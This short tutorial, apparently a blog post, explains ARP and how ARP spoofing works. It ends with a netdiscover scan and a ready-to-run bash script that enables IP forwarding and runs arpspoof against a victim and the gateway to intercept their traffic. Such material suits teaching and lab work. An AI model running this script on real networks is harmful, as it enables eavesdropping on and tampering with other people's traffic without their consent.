ARP Spoofing

ARP is a protocol from The TCP/IP model, which stands for Address Resolution Protocol, and the purpose of it is to translate IP address to MAC address and vice versa.

tcpip

Each host has an ARP table, with the entries of IP/MAC associations from the other known hosts in the localnetwork. to check the ARP table from your host, run:

arp -a

How ARP protocol works:

arp1

Client sends and ARP request in broadcast:

arp2

Only the host which has that IP address replies to the client:

arp3

In the ARP spoofing attack, the attacker tells that he is the gateway to the victim, and tells that he is the other host to the gateway, forwarding the packets between both of them.

arpattack

ARP spoofing is possible because: - Client accept arbitraty responses - Client does not verifies if the responses are authentic

Performing an attack

Discover the network

netdiscover -r 10.0.0.0/24
#!/bin/bash
# arpspoof_attack.sh
# 

INTERFACE=eth0
MY_ADDRESS=10.0.0.3
VICTIM_ADDRESS=10.0.0.2
GATEWAY_ADDRESS=10.0.0.1

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i $INTERFACE -t $VICTIM_ADDRESS $GATEWAY_ADDRESS &
arpspoof -i $INTERFACE -t $GATEWAY_ADDRESS $VICTIM_ADDRESS